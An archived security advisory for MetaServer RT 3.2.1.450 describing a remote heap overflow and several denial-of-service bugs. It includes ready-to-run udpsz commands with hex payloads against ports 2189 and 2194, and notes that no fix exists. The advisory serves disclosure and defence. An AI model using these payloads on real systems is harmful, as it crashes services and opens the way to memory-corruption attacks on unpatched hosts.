MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service: Posted Sep 21, 2011; Authored by Luigi Auriemma | Site aluigi.org; MetaServer RT versions 3.2.1.450 and below suffer from heap overflow and denial of service vulnerabilities.; tags | exploit, denial of service, overflow, vulnerability; SHA-256 | 7a443b62dbf2c43b4d149adce2a09d72963021bff26038d582a82a3bcec0adad; Download | Favorite | View

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

#######################################################################

                             Luigi Auriemma

Application:  MetaServer RT
              http://www.traderssoft.com/ts/msrt/
Versions:     <= 3.2.1.450
Platforms:    Windows
Bugs:         A] heap overflow
              B] various Denials of Service
Exploitation: remote
Date:         19 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
(eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
that are not supported originally."


#######################################################################

=======
2) Bugs
=======


The program listens on ports 2189, 2192 and 2194.

----------------
A] heap overflow
----------------

Through an interrupted connection with multiple packets on port 2189
and a subsequent reconnection it's possible to cause a heap overflow
and the relative write4.
Both the "MESSA" and "ROSCO" commands can be used.


-----------------------------
B] various Denials of Service
-----------------------------

Various invalid memory accesses and freezing of the program.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

A]
 udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

 stop after at least 50 dots and relaunch the command again till the
 crashing of the server during a memcpy.


B]
  udpsz -b 0x80 -T SERVER 2194 1000
  udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
  ...others...


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Top Authors In Last 30 Days

Red Hat 282 files
Ubuntu 65 files
Debian 22 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
gabe_k 3 files
Google Security Research 3 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

Share This

MetaServer RT 3.2.1.450 Heap Overflow / Denial Of Service

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems